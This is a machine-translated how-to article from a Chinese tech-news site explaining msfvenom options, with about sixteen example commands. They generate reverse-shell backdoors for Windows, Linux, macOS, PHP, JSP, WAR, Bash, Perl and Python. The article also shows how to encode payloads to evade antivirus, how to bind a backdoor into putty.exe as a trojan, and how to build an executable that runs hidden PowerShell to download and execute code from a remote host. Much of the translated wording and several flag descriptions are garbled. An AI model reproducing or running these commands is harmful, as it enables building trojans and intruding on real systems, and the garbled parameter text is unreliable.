In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-22 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article is to share with you about the example analysis of Msfvenom parameters, the editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.
Parameter description:
-p (--payload-options)
Add load payload.
Load this thing is more, this software is based on the corresponding load payload to generate the backdoor under the corresponding platform, so only choose the right payload, and then fill in the correct IP,PORT can generate the corresponding language, corresponding to the platform backdoor!
(--payload-options lists payload options)
-l
View all payload encoder nops.
-f (- help-formats)
Output file format.
(--help-formats lists all file formats)
Executable formats:
Asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:
Bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
-e
Code is free from killing.
-a (--platform-- help-platforms)
Select Architectural platform
X86 | x64 | x86x64
Platforms:
Windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
-o
File output.
S
The maximum length of the generated payload is the file size.
-b
Avoid using characters such as: do not use'\ 0f'.
-I
Number of encodings.
-c
Add your own shellcode.
-x |-k
Tie it up. For example, there used to be a normal file normal.exe that can bind the back door to this program through this option.
Example:
Example 1 (simple generation):
Msfvenom-p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111-f exe-o / Users/jiangzhehao/Downloads/1.exe
-p specifies the payload,payload followed by the option of the payload
-o specify the save path of the payload, including the file name
Example 2 (replace the specified code):
Msfvenom-p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111-b'\ x00'-f exe-o / Users/jiangzhehao/Downloads/1.exe
-b,-- bad-char replacement code with broken characters, such as'\ X00\ xff'
Example 3 (specify encoder):
Msfvenom-p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111-b'\ x00'-e x86/shikata_ga_nai-f exe-o / Users/jiangzhehao/Downloads/1.exe
-e specify a specific encoder
Example 4 (bind the backdoor to other executable programs):
Msfvenom-p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333-x / Users/jiangzhehao/Downloads/putty.exe-k-f exe-o / Users/jiangzhehao/Downloads/puuty_bind.exe
-p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 specifies parameters for payload and payload
-x / Users/jiangzhehao/Downloads/putty.exe executes the software to be bound
-k is separated from the original note file and a separate process is created
-f exe specifies the output format
-o / Users/jiangzhehao/Downloads/puuty_bind.exe specifies the output path
Instance 5 Windows
Msfvenom-platform windows-a x86-p windows/meterpreter/reverse_tcp-I 3-e x86/shikata_ga_nai-f exe-o C:\ back.exe
Msfvenom-platform windows-a x86-p windows/x64/meterpreter/reverse_tcp-f exe-o C:\ back.exe
Instance 6 Linux
Msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=-f elf > shell.elf
Instance 7 MAC
Msfvenom-p osx/x86/shell_reverse_tcp LHOST= LPORT=-f macho > shell.macho
Instance 8 PHP
Msfvenom-p php/meterpreter_reverse_tcp LHOST= LPORT=-f raw > shell.php
Example 9 Asp
Msfvenom-p windows/meterpreter/reverse_tcp LHOST= LPORT=-f asp > shell.asp
Instance 10 Aspx
Msfvenom-p windows/meterpreter/reverse_tcp LHOST= LPORT=-f aspx > shell.aspx
Instance 11 JSP
Msfvenom-p java/jsp_shell_reverse_tcp LHOST= LPORT=-f raw > shell.jsp
Instance 12 War
Msfvenom-p java/jsp_shell_reverse_tcp LHOST= LPORT=-f war > shell.war
Instance 13 Bash
Msfvenom-p cmd/unix/reverse_bash LHOST= LPORT=-f raw > shell.sh
Instance 14 Perl
Msfvenom-p cmd/unix/reverse_perl LHOST= LPORT=-f raw > shell.pl
Instance 15 Python
Msfvenom-p python/meterpreter/reverser_tcp LHOST= LPORT=-f raw > shell.py
Example 16 exe uses exec to execute powershell backdoor
Msfvenom-p windows/exec CMD= "powershell.exe-nop-w hidden-c $M=new-object net.webclient;$M.proxy= [Net.WebRequest]:: GetSystemWebProxy (); $M.Proxy.Credentials = [Net.CredentialCache]:: DefaultCredentials;IEX $M.downloadstring ('http://192.168.0.104:8080/4WFjDXrGo7Mj');"-f exe-e x86/shikata_ga_nai-I 6-o msf.exe"
The above is the example analysis of Msfvenom parameters, the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
